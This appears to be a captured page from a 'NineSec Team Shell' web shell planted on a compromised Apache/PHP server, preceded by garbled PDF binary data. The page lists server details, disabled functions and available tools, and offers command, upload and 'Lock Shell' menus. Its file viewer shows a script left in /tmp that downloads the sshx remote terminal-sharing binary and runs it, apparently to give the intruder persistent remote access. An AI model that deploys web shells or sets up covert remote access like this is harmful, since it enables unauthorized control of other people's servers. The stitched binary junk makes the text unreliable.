%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (1777) :  /lib64/../usr/../proc/../tmp/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //lib64/../usr/../proc/../tmp/1
#!/bin/sh

# This is a short script to install the latest version of the sshx binary.
#
# It's meant to be as simple as possible, so if you're not happy hardcoding a
# `curl | sh` pipe in your application, you can just download the binary
# directly with the appropriate URL for your architecture.
#
# If you'd like to run it without installing to /usr/local/bin, use `sh -s run`.
# To download to the current directory, use `sh -s download`.

set +e

case "$(uname -s)" in
  Linux*) suffix="-unknown-linux-musl";;
  Darwin*) suffix="-apple-darwin";;
  FreeBSD*) suffix="-unknown-freebsd";;
  MINGW*|MSYS*|CYGWIN*)
    echo "You are on Windows. Please visit sshx.io to download the executable.";
    exit 1;;
  *) echo "Unsupported OS $(uname -s)"; exit 1;;
esac

case "$(uname -m)" in
  aarch64 | aarch64_be | arm64 | armv8b | armv8l) arch="aarch64";;
  x86_64 | x64 | amd64) arch="x86_64";;
  armv6l) arch="arm"; suffix="${suffix}eabihf";;
  armv7l) arch="armv7"; suffix="${suffix}eabihf";;
  *) echo "Unsupported arch $(uname -m)"; exit 1;;
esac

url="https://s3.amazonaws.com/sshx/sshx-${arch}${suffix}.tar.gz"

if [ -z "$NO_COLOR" ]; then
  ansi_reset="33[0m"
  ansi_info="33[35;1m"
  ansi_error="33[31m"
  ansi_underline="33[4m"
fi

cmd=${1:-install}
temp=$(mktemp)

case $cmd in
  "run")
    path=$(mktemp -d)
    will_run=1
    ;;
  "download")
    path=$(pwd)
    ;;
  "install")
    path=$(pwd)
    ;;
  *)
    printf "${ansi_error}Error: Invalid command. Please use 'run', 'download', or 'install'.n"
    exit 1
    ;;
esac

printf "${ansi_reset}${ansi_info}↯ Downloading sshx from ${ansi_underline}%s${ansi_reset}n" "$url"
http_code=$(curl "$url" -o "$temp" -w "%{http_code}")
if [ "$http_code" -lt 200 ] || [ "$http_code" -gt 299 ]; then
  printf "${ansi_error}Error: Request had status code ${http_code}.n"
  cat "$temp" 1>&2
  printf "${ansi_reset}n"
  exit 1
fi

printf "n${ansi_reset}${ansi_info}↯ Adding sshx binary to ${ansi_underline}%s${ansi_reset}n" "$path"
if [ "$(id -u)" -ne 0 ] && [ "$path" = "$(pwd)" ]; then
  sudo tar xf "$temp" -C "$path" || exit 1
else
  tar xf "$temp" -C "$path" || exit 1
fi

printf "n${ansi_reset}${ansi_info}↯ Done! You can now run sshx.${ansi_reset}n"

if [ -n "$will_run" ]; then
  "$path/sshx"
  rm -f "$path/sshx"
fi

NineSec Team - 2022